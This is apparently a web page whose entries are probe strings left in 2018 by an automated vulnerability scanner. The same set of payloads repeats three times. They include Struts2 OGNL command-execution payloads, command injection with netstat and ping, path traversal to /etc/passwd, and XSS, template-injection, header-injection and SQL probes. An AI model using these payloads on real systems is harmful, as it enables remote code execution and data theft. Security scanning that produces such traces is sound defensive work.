%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 8/3/2018 10:35 AM
a(){}phpinfo(); function a
1
Created on: 8/3/2018 10:37 AM
|netstat -an
1
Created on: 8/3/2018 10:39 AM
http://rfitest/
1
Created on: 8/3/2018 10:41 AM
javascript:qxss(X3070560628Y2Z);
1
Created on: 8/3/2018 10:43 AM
";(function(){qxss});//
1
Created on: 8/3/2018 10:45 AM
");(function(){qxss});//
1
Created on: 8/3/2018 10:46 AM
';(function(){qxss});//
1
Created on: 8/3/2018 10:48 AM
9;(function(){qxss});//
1
Created on: 8/3/2018 10:50 AM
9
;(function(){qxss});//
1
Created on: 8/3/2018 10:52 AM
*/;(function(){qxss});/*
1
Created on: 8/3/2018 10:54 AM

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
Created on: 8/3/2018 10:56 AM
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
Created on: 8/3/2018 10:58 AM
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
1
Created on: 8/3/2018 11:00 AM
(23.0231*213.759)
1
Created on: 8/3/2018 11:05 AM
aaaa&ping -n 91 localhost&
1
Created on: 8/3/2018 11:07 AM
ping -c2 -i90 localhost
1
Created on: 8/3/2018 11:08 AM
|ping -c2 -i90 localhost
1
Created on: 8/3/2018 11:10 AM
|ping -c2 -i90 localhost|
1
Created on: 8/3/2018 11:13 AM

(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
Created on: 8/29/2018 9:58 AM
"><qss>
1
Created on: 8/29/2018 10:01 AM

"'><qss>
1
Created on: 8/29/2018 10:04 AM
z--><qss>
1
Created on: 8/29/2018 10:07 AM
"'><qss `;!--=&{()}>
1
Created on: 8/29/2018 10:10 AM
<script>_q=random(X3047324772Y2Z)</script>
1
Created on: 8/29/2018 10:13 AM

<script>_q_q=random()</script>
1
Created on: 8/29/2018 10:16 AM
<script src=//localhost/j>
1
Created on: 8/29/2018 10:19 AM
<script =">" SRC=//localhost/j>
1
Created on: 8/29/2018 10:22 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 8/29/2018 10:25 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 8/29/2018 10:28 AM
<IMG SRC=javascript:qss=7>
1
Created on: 8/29/2018 10:31 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 8/29/2018 10:34 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 8/29/2018 10:37 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 8/29/2018 10:40 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 8/29/2018 10:43 AM
"'><qss a=X3047324772Y2Z>
1
Created on: 8/29/2018 10:46 AM
' onEvent=X3047324772Y2Z
1
Created on: 8/29/2018 10:49 AM
" onEvent=X3047324772Y2Z
1
Created on: 8/29/2018 10:53 AM
<

script a=4>qss=7<

/script>
1
Created on: 8/29/2018 10:56 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 8/29/2018 11:00 AM
<script src=http://localhost/j
1
Created on: 8/29/2018 11:03 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 8/29/2018 11:06 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 8/29/2018 11:08 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 8/29/2018 11:11 AM

'
1
Created on: 8/29/2018 11:15 AM
;--
1
Created on: 8/29/2018 11:18 AM
#
1
Created on: 8/29/2018 11:21 AM
/*
1
Created on: 8/29/2018 11:25 AM
``
1
Created on: 8/29/2018 11:29 AM
,
1
Created on: 8/29/2018 11:32 AM
(
1
Created on: 8/29/2018 11:35 AM
1e309
1
Created on: 8/29/2018 11:38 AM
1
Created on: 8/29/2018 11:42 AM
/../../../../../../../etc/passwd
1
Created on: 8/29/2018 11:45 AM
/../../../../../../../etc/passwd
1
Created on: 8/29/2018 11:49 AM
../../../../../../../etc/passwd
1
Created on: 8/29/2018 11:52 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 8/29/2018 11:55 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 8/29/2018 11:59 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 8/29/2018 12:02 PM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 8/29/2018 12:06 PM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 8/29/2018 12:09 PM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 8/29/2018 12:13 PM
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 8/29/2018 12:16 PM
a(){}phpinfo(); function a
1
Created on: 8/29/2018 12:20 PM
|netstat -an
1
Created on: 8/29/2018 12:23 PM
http://rfitest/
1
Created on: 8/29/2018 12:27 PM
javascript:qxss(X3047324772Y2Z);
1
Created on: 8/29/2018 12:30 PM
";(function(){qxss});//
1
Created on: 8/29/2018 12:34 PM
");(function(){qxss});//
1
Created on: 8/29/2018 12:37 PM
';(function(){qxss});//
1
Created on: 8/29/2018 12:41 PM
9;(function(){qxss});//
1
Created on: 8/29/2018 12:44 PM
9
;(function(){qxss});//
1
Created on: 8/29/2018 12:47 PM
*/;(function(){qxss});/*
1
Created on: 8/29/2018 12:52 PM

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
Created on: 8/29/2018 12:54 PM
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
Created on: 8/29/2018 12:58 PM
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
1
Created on: 8/29/2018 1:01 PM
(23.0231*213.759)
1
Created on: 8/29/2018 1:08 PM
aaaa&ping -n 91 localhost&
1
Created on: 8/29/2018 1:12 PM
ping -c2 -i90 localhost
1
Created on: 9/3/2018 9:05 AM
"><qss>
1
Created on: 9/3/2018 9:07 AM

"'><qss>
1
Created on: 9/3/2018 9:08 AM
z--><qss>
1
Created on: 9/3/2018 9:10 AM
"'><qss `;!--=&{()}>
1
Created on: 9/3/2018 9:11 AM
<script>_q=random(X149960672Y2Z)</script>
1
Created on: 9/3/2018 9:13 AM

<script>_q_q=random()</script>
1
Created on: 9/3/2018 9:14 AM
<script src=//localhost/j>
1
Created on: 9/3/2018 9:15 AM
<script =">" SRC=//localhost/j>
1
Created on: 9/3/2018 9:17 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 9/3/2018 9:19 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 9/3/2018 9:20 AM
<IMG SRC=javascript:qss=7>
1
Created on: 9/3/2018 9:21 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 9/3/2018 9:23 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 9/3/2018 9:24 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 9/3/2018 9:26 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 9/3/2018 9:27 AM
"'><qss a=X149960672Y2Z>
1
Created on: 9/3/2018 9:29 AM
' onEvent=X149960672Y2Z
1
Created on: 9/3/2018 9:31 AM
" onEvent=X149960672Y2Z
1
Created on: 9/3/2018 9:32 AM
<

script a=4>qss=7<

/script>
1
Created on: 9/3/2018 9:34 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 9/3/2018 9:35 AM
<script src=http://localhost/j
1
Created on: 9/3/2018 9:37 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 9/3/2018 9:38 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 9/3/2018 9:40 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 9/3/2018 9:42 AM

'
1
Created on: 9/3/2018 9:43 AM
;--
1
Created on: 9/3/2018 9:45 AM
#
1
Created on: 9/3/2018 9:47 AM
/*
1
Created on: 9/3/2018 9:48 AM
``
1
Created on: 9/3/2018 9:50 AM
,
1
Created on: 9/3/2018 9:52 AM
(
1
Created on: 9/3/2018 9:53 AM
1e309
1
Created on: 9/3/2018 9:55 AM
1
Created on: 9/3/2018 9:57 AM
/../../../../../../../etc/passwd
1
Created on: 9/3/2018 9:58 AM
/../../../../../../../etc/passwd
1
Created on: 9/3/2018 10:00 AM
../../../../../../../etc/passwd
1
Created on: 9/3/2018 10:02 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 9/3/2018 10:03 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 9/3/2018 10:05 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 9/3/2018 10:07 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 9/3/2018 10:09 AM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 9/3/2018 10:10 AM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 9/3/2018 10:12 AM
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 9/3/2018 10:14 AM
a(){}phpinfo(); function a
1
Created on: 9/3/2018 10:15 AM
|netstat -an
1
Created on: 9/3/2018 10:17 AM
http://rfitest/
1
Created on: 9/3/2018 10:19 AM
javascript:qxss(X149960672Y2Z);
1
Created on: 9/3/2018 10:20 AM
";(function(){qxss});//
1
Created on: 9/3/2018 10:22 AM
");(function(){qxss});//
1
Created on: 9/3/2018 10:24 AM
';(function(){qxss});//
1
Created on: 9/3/2018 10:25 AM
9;(function(){qxss});//
1
Created on: 9/3/2018 10:27 AM
9
;(function(){qxss});//
1
Created on: 9/3/2018 10:29 AM
*/;(function(){qxss});/*
1
Created on: 9/3/2018 10:31 AM

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
Created on: 9/3/2018 10:32 AM
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
Created on: 9/3/2018 10:34 AM
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
1
Created on: 9/3/2018 10:36 AM
(23.0231*213.759)
1
Created on: 9/3/2018 10:40 AM
aaaa&ping -n 91 localhost&
1
Created on: 9/3/2018 10:42 AM
ping -c2 -i90 localhost
1
Created on: 9/3/2018 10:43 AM
|ping -c2 -i90 localhost
1
Created on: 9/3/2018 10:45 AM
|ping -c2 -i90 localhost|
1
Created on: 9/3/2018 10:48 AM

(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))